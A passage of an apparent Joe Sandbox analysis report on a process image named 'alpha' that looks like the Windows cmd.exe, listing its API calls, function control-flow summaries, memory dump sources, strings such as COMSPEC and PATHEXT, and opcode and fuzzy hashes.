                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                        • Part of subcall function 00007FF7E1DC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                        • Part of subcall function 00007FF7E1DC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7E1DC4E35), ref: 00007FF7E1DC55DA
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5623
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5667
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC56BE
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5702
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E35
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E81
                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F69
                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F95
                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FB0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FC1
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FD8
                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FF8
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5037
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC504B
                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50DF
                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50F2
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC510F
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5130
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC514A
                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5175
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                      • API String ID: 1049357271-3021193919
                                                      • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction ID: 359a3c70616b9cacae5f44e083aeee61fc86ae4e41e3989a39ae451a5ba3c388
                                                      • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                      • Instruction Fuzzy Hash: 17C17261E08A4296EB04FB11A806379F7A0FF89B91FC48536D90E43395DFBCE545C3A2

                                                      Control-flow Graph

                                                      control_flow_graph: function starting at 7ff7e1dc3c24, calling GetCurrentDirectoryW, towupper, iswalpha, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, GetLastError and _local_unwind; executed/not-executed legend and node and edge layout data of the rendered graph omitted.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                      • String ID: :
                                                      • API String ID: 1809961153-336475711
                                                      • Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction ID: 4ec76dc31363dbd345fda882f7e6bc98f7d0c1f480bb4d0d3ff1ce62d33001d8
                                                      • Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
                                                      • Instruction Fuzzy Hash: ADD15F32A18B8591EB20EB15E4463B9F7A1FB84740F848A37DA8E437A4DFBCE444C751

                                                      Control-flow Graph

                                                      control_flow_graph: function starting at 7ff7e1dc2394, calling memset, GetModuleFileNameW, wcschr, _wcsupr, wcsrchr, _wcsicmp and ??_V@YAXPEAX@Z; executed/not-executed legend and node and edge layout data of the rendered graph omitted.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                      • API String ID: 2622545777-4197029667
                                                      • Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction ID: e3ce112b628bd6a685205ba7cf54b56763ecfaa58bffd89a1914da3c8a3066ec
                                                      • Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
                                                      • Instruction Fuzzy Hash: 69919161B0968285EF25EB10D8523B9E7A5FF44B44FC48536C90E87695DFBCE504C3A2

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID: CMD.EXE
                                                      • API String ID: 1606018815-3025314500
                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction ID: 305bc909e2150de27535e9c9249add56f83aa816bc878c3d18c7c9d81822ff7b
                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                      • Instruction Fuzzy Hash: F141F035E09A029BE708EB15E846378BB60FB89752FC4D176C51E83364DFBCA514C662

                                                      Control-flow Graph

                                                      control_flow_graph: function starting at 7ff7e1dbc620, calling GetConsoleTitleW, GetLastError, towupper, SetConsoleTitleW, wcsncmp and wcschr; executed/not-executed legend and node and edge layout data of the rendered graph omitted.
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleTitlewcschr
                                                      • String ID: /$:
                                                      • API String ID: 2364928044-4222935259
                                                      • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                      • Instruction ID: 5652382e6586cbacfea63a5d71d9cb95beb8bfa4e2eb34bd2aa80afd744bc34c
                                                      • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                      • Instruction Fuzzy Hash: 8EC1AF61E18642A1FB24FB15D416BB9A2A0FF84B90FC88537DA1F462D5DFBCE440C362

                                                      Control-flow Graph

                                                      control_flow_graph: function starting at 7ff7e1dc8d80, calling Sleep, _amsg_exit, _initterm, exit and _cexit; executed/not-executed legend and node and edge layout data of the rendered graph omitted.
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                      • String ID:
                                                      • API String ID: 4291973834-0
                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction ID: 670618e5eb25f9c9fc1a6c64f9bb240db8d93f711c49c73dc78f429ce4a5940a
                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                      • Instruction Fuzzy Hash: 6D410831E08A0386FB54FB14E882735A2A4EF44745F859937D90D876A0DFFDE890C7A2

                                                      Control-flow Graph: function at 7ff7e1dc4a14 (rendered graph with Executed / Not Executed legend omitted)
                                                      APIs
                                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                      • memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                      • String ID:
                                                      • API String ID: 1623332820-0
                                                      • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                      • Instruction ID: e7159a356838dfa925e944921bed8ffde96f7ac5a5e3fea81a3999d98a113248
                                                      • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                      • Instruction Fuzzy Hash: E211C122A08B4282DF15EB05B005239FBA0EB8DF84B989436DE0E43740DF7CE441C760

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                      • String ID:
                                                      • API String ID: 1826527819-0
                                                      • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction ID: d4a4e73356d4e9d5c7dbfef9c40d17cc312ba0178867650c8d9b58e6aa1ba63f
                                                      • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                      • Instruction Fuzzy Hash: 7B015B31D086828AE708FB14E8463B8FA60FB8A756FC4A272D54F42395CFBC9044C762
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7E1DB92AC), ref: 00007FF7E1DC30CA
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC30DD
                                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC30F6
                                                      • SetErrorMode.KERNELBASE ref: 00007FF7E1DC3106
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$FullNamePathwcschr
                                                      • String ID:
                                                      • API String ID: 1464828906-0
                                                      • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction ID: 76a66d34887542013583b6698710f7e4e74c860733a02fc8b4b6020e6b31f2fe
                                                      • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                      • Instruction Fuzzy Hash: 47312562E0861186E724EF15A00227EF660FB95B80FD48636DA4A433D0EEBDE845C752
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                      • API String ID: 2221118986-3416068913
                                                      • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction ID: c5bbe789aa92e062867f0b19c12af857f8324bbe20e35514066c1a948cae41e0
                                                      • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                      • Instruction Fuzzy Hash: C211EC21B0874281EF54EB15E1463BA9250EF44BA4FD84333DE6E477D5DE7CD0808361
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memsetwcschr
                                                      • String ID: 2$COMSPEC
                                                      • API String ID: 1764819092-1738800741
                                                      • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction ID: 551e4d2b5a574d57db68f67059a82539fb13773ec96c674970ccebef499d4380
                                                      • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                      • Instruction Fuzzy Hash: 17519062E0864665FB64FB25A443779A391BF44784FC84033DA4F866E5DEFCE8408763
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                      • String ID:
                                                      • API String ID: 4254246844-0
                                                      • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                      • Instruction ID: 7f0706e067ea587e5421b703a0f6d6cfad5861e52a6cf91a1bc5c54f58284b71
                                                      • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                      • Instruction Fuzzy Hash: FA41B662A0C74696EF10EF01E446379EBA0EF85B80FC54932D94D47784DEBCE441C7A2
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                      • String ID:
                                                      • API String ID: 2643372051-0
                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction ID: 057bb0f319481f7d1869f57c90cecc99223403de147e35276248c35a7a42a83b
                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction Fuzzy Hash: D9F02662A09B4281EB04FB25F402274EAE0FF4D7A0BC58236C93E43390CFBC80408251
                                                      APIs
                                                      Memory Dump Source
